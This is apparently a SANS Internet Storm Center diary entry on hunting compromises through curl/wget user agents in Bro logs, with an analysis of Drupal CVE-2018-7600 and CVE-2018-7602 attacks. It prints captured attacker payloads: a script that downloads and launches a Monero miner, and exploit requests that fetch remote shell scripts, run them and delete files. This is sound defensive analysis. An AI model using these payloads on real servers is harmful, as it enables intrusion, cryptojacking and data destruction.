Threat Level: green Handler on Duty: Tom Webb

SANS ISC: Internet Storm Center - SANS Internet Storm Center Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

More Threat Hunting with User Agent and Drupal Exploits

Published: 2018-04-27
Last Updated: 2018-04-27 01:45:18 UTC
by Tom Webb (Version: 1)
0 comment(s)

 

It's typical to do hunting with user agents by using frequency analysis, sometimes called stacking. But many malicious scripts use built-in tools to grab malware such as wget or curl. Let's see if a compromised server has used a command line tool to get malware or tools.

 

Start off by grabbing your BRO HTTP logs and pulling out the user agents you want. In this example we are looking for curl, wget, or perl.

#zcat 2018-04-*/http* |egrep 'curl|wget|perl' >/nsm/tmp/cmdline-internet.txt

 

Next lets pull out your IP (172.16.1.0) network that is the source as the user agent because we are looking for connections outbound from you network.

#awk '{if ($3 ~ /172.16.1/ ) print $0}' /nsm/tmp/cmdline-internet.txt >>/nsm/tmp/cmdline-internet-outgoing.txt

 

Now grap the URI that ends with RAR, SH, GZ, TGZ,PL,PY,PHP,TXT. These are the file extension we are going to look for malware that is trying to download.

#awk '{print $10}' cmdline-internet-outgoing.txt |egrep '\.rar$|\.sh$|\.gz$|\.zip$|\.tgz$|\.pl$|\.py$|\.php$|\.txt$' |sort |uniq


While looking through the data a single letter or number file is always interesting because attackers typically use this. I came across the below.

 

1524003195.150601 CFzvkl4xwEYKAjEeu6 172.16.1.22 55053 5.2.74.245 80 1 GET 5.2.74.245 /c.sh - - curl/7.43.0 0 0 - -- - (empty) - - - - - - - - -

1524044872.633174 CXBXqE1ZCC3d8Ka4Hi 172.16.1.22 57165 5.2.74.245 80 1 GET 5.2.74.245 /c.sh - - curl/7.43.0 0 0 - -- - (empty) - - - - - - - - -

1524051612.017796 CKkmMp3GdGwiE7yppi 172.16.1.22 57527 185.165.169.146 80 1 GET 185.165.169.146 /c.sh - - curl/7.43.0 0 0


I looked at the file to see what's in it. In this case, it contained the following script.

 

curl hxxp://185.165.169.146/c.sh

mkdir /tmp/.x11_kenp0le/

curl hxxp://185.165.169.146/sen -o /tmp/.x11_kenp0le/nttprd

chmod +x /tmp/.x11_kenp0le/nttprd

/tmp/.x11_kenp0le/nttprd -B -a cryptonight -o stratum+tcp://pool.minexmr.com:80 -u 49CSBHFhjm5RVGiJuVh7ANEsdozsXMfkCE2rCEHXjTgoJNVdSzyvg8tM1xLpQH8R7mfcEf5jtArJf5S9XBrgfmNz5yTRMiM -p x &>>/dev/null


 

The script appears to be installing a cryptocoin miner. Let's go back through BRO and see if this system accessed the file.

#zcat http* |fgrep 185.165.169.146 |fgrep sen

1524051614.459145 CI8e9G1izBkAi8rN8h 172.16.1.22 57528 185.165.169.146 80 1 GET 185.165.169.146 /sen - - curl/7.43.0 0 0 - -- - (empty) - - - - - - - - -



 

Based on the results, we know it at least tried to download the file. Now it's time to start looking at the system. After collecting MACtimes from the system disk, let's see what happened in the temp directory.

#fgrep ‘.x11_kenp0le’ mactime.csv

Mon Apr 23 2018 04:05:12,68,m.c.,drwxr-xr-x,501,0,0,"/tmp/.x11_kenp0le"

Tue Apr 24 2018 13:08:10,68,.a..,drwxr-xr-x,501,0,0,"/tmp/.x11_kenp0le"



 

Looking at these results, it appears that only the folder was created, but the file was not downloaded to the disk. It turns out this system was running an unpatched version of Drupal (CVE-2018-7600), and below was the payload for the exploit.

 

54.37.67.39 : 39474
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Host: 172.16.1.22
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.5 (Java/1.8.0_151)
Accept-Encoding: gzip,deflate
form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget+-qO+-+http%3A%2F%2F54.39.23.28%2F1sh+%7C+sh

 

 

 

Speaking of Drupal exploits, we are seeing some new exploits in the wild for the latest CVE this week (CVE-2018-7602).

 

I’ve seen several variations of the following attack.

http://172.16.1.22/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=wget+-O+kurd.php+%27http%3A%2F%2Fwww.ioletravel.gr%2F1.txt%27

 

I pulled down 1.txt and did a quick look at it. It appears to be download a version of request-sanitizer.inc (pastebin.com/raw/PTLaTqvh) and bootstrap.inc (pastebin.com/raw/j0nms59V') and replaces these files. This code looks to be the work-around patch from Drupal.

After it patches, it profiles the system, creates 3 file upload backdoors each named apis.php. Finally, its creates a krd.html that is the defacement which links back to a picture on hxxp://zonehmirrors.org.

 

There is a base64 version of the same attack above.

http://172.16.1.22/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%22JGt1cmQ9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmUjBWVVd5SnJkWEprSWwwcEtR (Truncated)

 

The last version I’ve seen I was not able to pull down the script to see what it did to the system. If anyone has a copy please pass it along.

http://172.16.1.22/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=cd%20/tmp;%20wget%20hxxp://185.101.97.249/runp.sh%20;%20chmod%20777%20runp.sh%20;%20./runp.sh%20;%20rm%20-rf%20*
 

Let us know if you are seeing other variations of the attacks.

 

 

--

Tom Webb

@twsecblog

Keywords: Drupal Hunt
0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Yet Another Drupal RCE Vulnerability
Apr 26th 2018
17 hours ago by Johannes (0 comments)

Malicious Network Traffic From /bin/bash
Apr 25th 2018
1 day ago by Xme (0 comments)

Apple Patches iOS, Safari and MacOS
Apr 24th 2018
2 days ago by Johannes (0 comments)

The real value of an IOC?
Apr 24th 2018
2 days ago by Xme (0 comments)

New IE 0-day in the wild
Apr 23rd 2018
3 days ago by DidierStevens (2 comments)

A malicious word document with a VBA form - video
Apr 21st 2018
5 days ago by DidierStevens (0 comments)

Malspam pushing ransomware using two layers of password protection to avoid detection
Apr 20th 2018
1 week ago by Brad (0 comments)

View All Diaries →

Latest Discussions

MinerPool Threat Feed info
created Apr 4th 2018
3 weeks ago by Anonymous (0 replies)

DShield on RPi returns no mySQL when running /home/pi/install/dshield/bin/status.sh
created Mar 29th 2018
4 weeks ago by nekton89 (0 replies)

Splunk: Any way to fetch logs via ssh
created Mar 15th 2018
1 month ago by Anonymous (2 replies)

Possible new worm activity
created Mar 13th 2018
1 month ago by Anonymous (0 replies)

Detecting the memcached issue
created Mar 9th 2018
1 month ago by David (0 replies)

View All Forums →

Latest News

View All News →

Top Diaries

Wide-scale Petya variant ransomware attack noted
Jun 27th 2017
9 months ago by Brad (6 comments)

Using a Raspberry Pi honeypot to contribute data to DShield/ISC
Aug 3rd 2017
8 months ago by Johannes (16 comments)

Detection Lab: Visibility & Introspection for Defenders
Dec 15th 2017
4 months ago by Russ McRee (2 comments)

Second Google Chrome Extension Banker Malware in Two Weeks
Aug 29th 2017
7 months ago by Renato (0 comments)

Maldoc with auto-updated link
Aug 17th 2017
8 months ago by Xme (2 comments)